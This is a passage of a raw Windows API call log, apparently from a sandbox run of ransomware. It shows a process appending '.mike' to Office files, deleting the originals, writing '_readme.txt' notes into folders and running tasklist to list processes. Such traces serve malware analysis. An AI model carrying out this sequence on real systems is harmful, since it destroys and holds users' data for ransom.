lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike", lpFilePart=0x0) returned 0x4c [0046.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.793] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe615fa40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe615fa40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe6185ba0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9c0)) returned 1 [0046.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpFilePart=0x0) returned 0x47 [0046.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike", lpFilePart=0x0) returned 0x4c [0046.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0046.793] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2211c90 | out: lpFileInformation=0x2211c90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe615fa40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe615fa40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe6185ba0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9c0)) returned 1 [0046.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0046.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpFilePart=0x0) returned 0x47 [0046.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", dwFileAttributes=0x80) returned 1 [0046.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpFilePart=0x0) returned 0x47 [0046.793] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 1 [0046.794] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpFilePart=0x0) returned 0x47 [0046.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.794] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.795] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", lpFilePart=0x0) returned 0x47 [0046.795] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\_readme.txt", lpFilePart=0x0) returned 0x48 [0046.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0046.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0046.795] GetFileType (hFile=0x264) returned 0x1 [0046.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0046.795] GetFileType (hFile=0x264) returned 0x1 [0046.795] WriteFile (in: hFile=0x264, lpBuffer=0x2213954*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x2213954*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0046.796] CloseHandle (hObject=0x264) returned 1 [0046.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll", lpFilePart=0x0) returned 0x4a [0046.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033", lpFilePart=0x0) returned 0x3c [0046.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", lpFilePart=0x0) returned 0x3d [0046.797] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe6185ba0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe6185ba0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.797] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe6185ba0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe6185ba0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.797] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0x305a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEINTL.DLL", cAlternateFileName="")) returned 1 [0046.797] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0xcdb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODBCI.DLL", cAlternateFileName="")) returned 1 [0046.797] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x51d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACERECR.DLL", cAlternateFileName="")) returned 1 [0046.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xd2990, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEWSTR.DLL", cAlternateFileName="")) returned 1 [0046.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f139500, ftCreationTime.dwHighDateTime=0x1c69359, ftLastAccessTime.dwLowDateTime=0xee2ce510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7f139500, ftLastWriteTime.dwHighDateTime=0x1c69359, nFileSizeHigh=0x0, nFileSizeLow=0x19a3ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADO210.CHM", cAlternateFileName="")) returned 1 [0046.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b06d00, ftCreationTime.dwHighDateTime=0x1ca9127, ftLastAccessTime.dwLowDateTime=0xee2ce510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe4b06d00, ftLastWriteTime.dwHighDateTime=0x1ca9127, nFileSizeHigh=0x0, nFileSizeLow=0x25b50, dwReserved0=0x0, dwReserved1=0x0, cFileName="ALRTINTL.DLL", cAlternateFileName="")) returned 1 [0046.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e15000, ftCreationTime.dwHighDateTime=0x1cbf3e5, ftLastAccessTime.dwLowDateTime=0xc24a9ec0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe5e15000, ftLastWriteTime.dwHighDateTime=0x1cbf3e5, nFileSizeHigh=0x0, nFileSizeLow=0x269380, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL", cAlternateFileName="")) returned 1 [0046.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b30dd00, ftCreationTime.dwHighDateTime=0x1cac9ab, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5b30dd00, ftLastWriteTime.dwHighDateTime=0x1cac9ab, nFileSizeHigh=0x0, nFileSizeLow=0xd980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.IDX_DLL", cAlternateFileName="MSOINT~1.IDX")) returned 1 [0046.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c620a00, ftCreationTime.dwHighDateTime=0x1cac9ab, ftLastAccessTime.dwLowDateTime=0xeee8f1b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5c620a00, ftLastWriteTime.dwHighDateTime=0x1cac9ab, nFileSizeHigh=0x0, nFileSizeLow=0x152f80, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.IDX_DLL", cAlternateFileName="MSOINT~2.IDX")) returned 1 [0046.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15d97a00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0xeeedb470, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x15d97a00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0xa388, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSSOAPR3.DLL", cAlternateFileName="")) returned 1 [0046.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x356f9800, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x356f9800, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x2d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="OARPMANR.DLL", cAlternateFileName="")) returned 1 [0046.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe615fa40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe615fa40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe6185ba0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.HTM.mike", cAlternateFileName="README~1.MIK")) returned 1 [0046.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb401ca00, ftCreationTime.dwHighDateTime=0x1cbdec9, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb401ca00, ftLastWriteTime.dwHighDateTime=0x1cbdec9, nFileSizeHigh=0x0, nFileSizeLow=0x19b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="xlsrvintl.dll", cAlternateFileName="XLSRVI~1.DLL")) returned 1 [0046.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6185ba0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe6185ba0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe6185ba0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0046.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6185ba0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe6185ba0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe6185ba0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0046.799] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.800] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", lpFilePart=0x0) returned 0x40 [0046.800] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.800] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.800] CoTaskMemFree (pv=0x4fe370) [0046.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.800] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", lpFilePart=0x0) returned 0x40 [0046.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.800] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", lpFilePart=0x0) returned 0x40 [0046.800] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\", lpFilePart=0x0) returned 0x41 [0046.800] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE.ODF", cAlternateFileName="")) returned 1 [0046.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.802] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0046.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0046.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0046.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0046.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0046.850] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0046.874] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0046.874] CreatePipe (in: hReadPipe=0x2af01c, hWritePipe=0x2af018, lpPipeAttributes=0x2aef9c, nSize=0x0 | out: hReadPipe=0x2af01c*=0x264, hWritePipe=0x2af018*=0x27c) returned 1 [0046.875] GetCurrentProcess () returned 0xffffffff [0046.875] GetCurrentProcess () returned 0xffffffff [0046.875] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x264, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2af020, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2af020*=0x278) returned 1 [0046.875] CloseHandle (hObject=0x264) returned 1 [0046.875] CreatePipe (in: hReadPipe=0x2af01c, hWritePipe=0x2af018, lpPipeAttributes=0x2aef9c, nSize=0x0 | out: hReadPipe=0x2af01c*=0x264, hWritePipe=0x2af018*=0x280) returned 1 [0046.875] GetCurrentProcess () returned 0xffffffff [0046.875] GetCurrentProcess () returned 0xffffffff [0046.875] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x264, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2af020, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2af020*=0x284) returned 1 [0046.875] CloseHandle (hObject=0x264) returned 1 [0046.875] CoTaskMemAlloc (cb=0x20e) returned 0x4fe980 [0046.875] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4fe980 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.875] CoTaskMemFree (pv=0x4fe980) [0046.875] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"tasklist\" /v /fo csv", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2aef64*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x27c, hStdError=0x280), lpProcessInformation=0x221c56c | out: lpCommandLine="\"tasklist\" /v /fo csv", lpProcessInformation=0x221c56c*(hProcess=0x288, hThread=0x264, dwProcessId=0x964, dwThreadId=0xb0)) returned 1 [0047.136] CloseHandle (hObject=0x27c) returned 1 [0047.136] CloseHandle (hObject=0x280) returned 1 [0047.136] GetFileType (hFile=0x278) returned 0x3 [0047.136] GetFileType (hFile=0x284) returned 0x3 [0047.136] CloseHandle (hObject=0x264) returned 1 [0047.136] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0xc, lpOverlapped=0x0) returned 1 [0050.809] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x1, lpOverlapped=0x0) returned 1 [0050.810] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, lpNumberOfBytesRead=0x2af0e0*=0x5, lpOverlapped=0x0) returned 1 [0050.810] ReadFile (in: hFile=0x278, lpBuffer=0x221ce68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2af0e0, lpOverlapped=0x0 | out: lpBuffer=0x221ce68*, 